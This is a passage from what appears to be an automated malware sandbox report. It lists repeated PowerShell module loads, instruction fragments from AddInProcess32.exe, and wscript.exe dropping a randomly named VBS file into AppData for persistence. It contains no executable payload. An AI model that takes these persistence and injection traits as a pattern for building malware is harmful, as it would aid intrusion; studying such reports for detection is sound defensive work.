          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DD48EE push edi; retf 5_2_00DD48F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DD4097 push ebx; retf 5_2_00DD4098
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB685F push ecx; iretd 5_2_00DB6862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC4843 pushad ; ret 5_2_00DC4844
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DCF07B push esp; retf 5_2_00DCF082
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DD4070 pushfd ; retf 5_2_00DD4071
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DCE93D pushad ; iretd 5_2_00DCE93E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB3470 push eax; ret 5_2_00DB3472
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DCA5E1 push ss; ret 5_2_00DCA5E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC5EC3 push 3E994BE1h; retf 1C42h5_2_00DC5F93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC3EF3 push edx; retn 42A5h5_2_00DC3F86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DD4E73 push edi; iretd 5_2_00DD4E7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DD3E3E push esp; retf 5_2_00DD3E3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A09AD push ecx; mov dword ptr [esp], ecx5_2_018A09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2C54F push 8B00DB67h; ret 14_2_00E2C554
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2C54D pushfd ; ret 14_2_00E2C54E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2C9D7 push edi; ret 14_2_00E2C9D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DE09AD push ecx; mov dword ptr [esp], ecx14_2_00DE09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DB1366 push eax; iretd 14_2_00DB1369
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E37E99 push ecx; ret 14_2_00E37EAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DB1FEC push eax; iretd 14_2_00DB1FED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0186C54D pushfd ; ret 19_2_0186C54E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018209AD push ecx; mov dword ptr [esp], ecx19_2_018209B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0186C9D7 push edi; ret 19_2_0186C9D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_017F1368 push eax; iretd 19_2_017F1369
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_017F1FEC push eax; iretd 19_2_017F1FED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01877E99 push ecx; ret 19_2_01877EAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2C54F push 8B019B67h; ret 23_2_01A2C554
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2C54D pushfd ; ret 23_2_01A2C54E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019E09AD push ecx; mov dword ptr [esp], ecx23_2_019E09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2C9D7 push edi; ret 23_2_01A2C9D9

          Persistence and Installation Behavior

          barindex
          Windows Shell Script Host drops VBS files
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
